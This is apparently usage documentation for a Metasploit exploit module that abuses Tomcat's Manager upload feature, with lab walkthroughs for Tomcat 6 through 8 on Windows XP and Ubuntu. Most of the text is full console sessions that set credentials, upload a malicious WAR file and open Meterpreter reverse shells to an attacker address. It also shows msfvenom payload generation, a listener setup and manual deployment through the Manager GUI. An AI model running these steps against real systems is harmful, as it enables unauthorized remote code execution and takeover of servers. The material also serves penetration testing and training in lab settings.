h00die
16 KiB
Documentation Format
This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
tomcat_mgr_deploy
This module is VERY similar to exploit/multi/http/tomcat_mgr_deploy, the main difference is this uses a POST HTTP request through the GUI, instead of a PUT HTTP request. This module also automatically undeploys (clean up) the malicious app.
Windows (xp sp2)
Tomcat 6 (6.0.48)
Setup
The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role manager-gui, which is Tomcat 7+ syntax.
For this exploitation, it was changed to simply manager.
Exploitation
-
Edit
C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xmlto add the following under the<tomcat-users>line:<role rolename="manager"/> <user username="tomcat" password="tomcat" roles="manager"/> -
Restart Tomcat service
-
Exploit:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set rport 8086 rport => 8086 msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > check [*] 192.168.2.108:8086 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7... [*] Executing ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7... [*] Undeploying ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:3387) at 2017-01-15 19:18:14 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows
Tomcat 7 (7.0.73)
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. The manager-gui permission is required for this exploit.
Setup
The install was default, other than adding a user during install. No other options were changed.
Exploitation
-
If a user was not defined at install, you will need to add a
manager-guipermission user. EditC:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xmlto add the following under the<tomcat-users>line:<role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="manager-gui"/> -
Restart the service if a user was added/changed
-
Exploitation:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_upload) > check [*] 192.168.2.108:8087 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying vm5yNsROSQ... [*] Executing vm5yNsROSQ... [*] Undeploying vm5yNsROSQ ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:3427) at 2017-01-15 19:25:22 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows
Tomcat 8 (8.0.39)
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. The manager-gui permission is required for this exploit.
Setup
The install was default, other than adding a user during install. No other options were changed.
Exploitation
-
If a user was not defined at install, you will need to add a
manager-guipermission user. EditC:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xmlto add the following under the<tomcat-usersline:<role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="manager-gui"/> -
Restart the service if a user was added/changed
-
Exploitation:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > set verbose true verbose => true msf exploit(tomcat_mgr_upload) > check [*] Tomcat Manager found running on win platform and x86 architecture [!] No active DB -- Credential data will not be saved! [*] 192.168.2.108:8088 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Finding CSRF token... [*] Uploading and deploying AiV6YUyTkEpIK5G87r0gmdf8fFH... [*] Uploading 6094 bytes as AiV6YUyTkEpIK5G87r0gmdf8fFH.war ... [*] Executing AiV6YUyTkEpIK5G87r0gmdf8fFH... [*] Executing /AiV6YUyTkEpIK5G87r0gmdf8fFH/u9TOPpZzy6dj21L.jsp... [*] Finding CSRF token... [*] Undeploying AiV6YUyTkEpIK5G87r0gmdf8fFH ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:3508) at 2017-01-15 19:38:29 -0500 meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows
Linux
Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
Setup
- Install Tomcat and dependencies:
sudo apt-get install tomcat6 tomcat6-admin
Exploit
-
Edit
/etc/tomcat6/tomcat-users.xmlto add the following:<role rolename="manager"/> <user username="tomcat" password="tomcat" roles="manager"/> -
Restart the service if a user was added/changed:
sudo service tomcat6 restart -
Exploit:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > set verbose true verbose => true msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.156 rhost => 192.168.2.156 msf exploit(tomcat_mgr_upload) > set rport 8080 rport => 8080 msf exploit(tomcat_mgr_upload) > check [*] Tomcat Manager found running on linux platform and x64 architecture [!] No active DB -- Credential data will not be saved! [*] 192.168.2.156:8080 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Finding CSRF token... [*] Uploading and deploying biytXntmq4Dtie0ulwwT... [*] Uploading 6082 bytes as biytXntmq4Dtie0ulwwT.war ... [!] No active DB -- Credential data will not be saved! [*] Executing biytXntmq4Dtie0ulwwT... [*] Executing /biytXntmq4Dtie0ulwwT/rmslIdWH4LwPZlMkHipzUah.jsp... [*] Finding CSRF token... [*] Undeploying biytXntmq4Dtie0ulwwT ... [*] Sending stage (49409 bytes) to 192.168.2.156 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.156:55062) at 2017-01-15 20:29:42 -0500 meterpreter > sysinfo Computer : Ubuntu14 OS : Linux 4.2.0-27-generic (amd64) Meterpreter : java/linux
Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
Of note, as of Tomcat 7, the permission role manager has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.
Setup
- Install Tomcat and dependencies:
apt-get install tomcat7 tomcat7-admin
text/script Interface Exploitation
-
Edit
/etc/tomcat7/tomcat-users.xmlto add:<role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="manager-gui"/> -
Restart the service if a user was added/changed:
sudo service tomcat7 restart -
Exploit:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > set verbose true verbose => true msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_upload) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_upload) > check [*] Tomcat Manager found running on linux platform and x64 architecture [!] No active DB -- Credential data will not be saved! [*] 192.168.2.118:8087 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Finding CSRF token... [*] Uploading and deploying QyjbnIqnn23FOe... [*] Uploading 6077 bytes as QyjbnIqnn23FOe.war ... [*] Executing QyjbnIqnn23FOe... [*] Executing /QyjbnIqnn23FOe/2NFgGA5fk1.jsp... [*] Finding CSRF token... [*] Undeploying QyjbnIqnn23FOe ... [*] Sending stage (49409 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33808) at 2017-01-15 20:04:21 -0500 meterpreter > sysinfo Computer : tomcat OS : Linux 4.4.0-59-generic (amd64) Meterpreter : java/linux
Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. The manager-gui permission is required for this exploit.
Setup
apt-get install tomcat8 tomcat8-admin
text/script Interface Exploitation
-
Edit
/etc/tomcat8/tomcat-users.xmlto add:<role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="manager-gui"/> -
Restart the service if a user was added/changed:
sudo service tomcat8 restart -
Exploit:
msf > use exploit/multi/http/tomcat_mgr_upload msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat HttpPassword => tomcat msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_upload) > set verbose true verbose => true msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_upload) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_upload) > check [*] Tomcat Manager found running on linux platform and x64 architecture [*] 192.168.2.118:8088 The target appears to be vulnerable. msf exploit(tomcat_mgr_upload) > exploit [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Retrieving session ID and CSRF token... [*] Finding CSRF token... [*] Uploading and deploying Bjf01M65XUROXL36wmIc85OmtY... [*] Uploading 6092 bytes as Bjf01M65XUROXL36wmIc85OmtY.war ... [*] Executing Bjf01M65XUROXL36wmIc85OmtY... [*] Executing /Bjf01M65XUROXL36wmIc85OmtY/UbPmEhI1wkAf8Yj1rTohvPQWPIADy5.jsp... [*] Finding CSRF token... [*] Undeploying Bjf01M65XUROXL36wmIc85OmtY ... [*] Sending stage (49409 bytes) to 192.168.2.118 [*] Meterpreter session 3 opened (192.168.2.117:4444 -> 192.168.2.118:33814) at 2017-01-15 20:08:13 -0500 meterpreter > sysinfo Computer : tomcat OS : Linux 4.4.0-59-generic (amd64) Meterpreter : java/linux
Manual Exploitation
Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
- Tomcat 6.0.48:
manager - Tomcat 7.0.73:
manager-gui - Tomcat 8.0.39:
manager-gui
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
Setup Handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
Deploy
- With a web browser, browse to
http://<ip>:<port>/manager/html - Enter credentials (no default)
- Under
Deploy>WAR file to deploy, click browse to selectmeterp.war, clickDeploy meterpshould now be listed underApplications, meaning it was successfully deployed.- Either click the link for
/meterpor browse tohttp://<ip>:<port>/meterp/
Callback
After browsing to that page, code execution will happen, and your callback will hit.
[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
Manual Cleanup
This will NOT remove the meterpreter from Tomcat, click Undeploy within the Application list to remove meterp from Tomcat.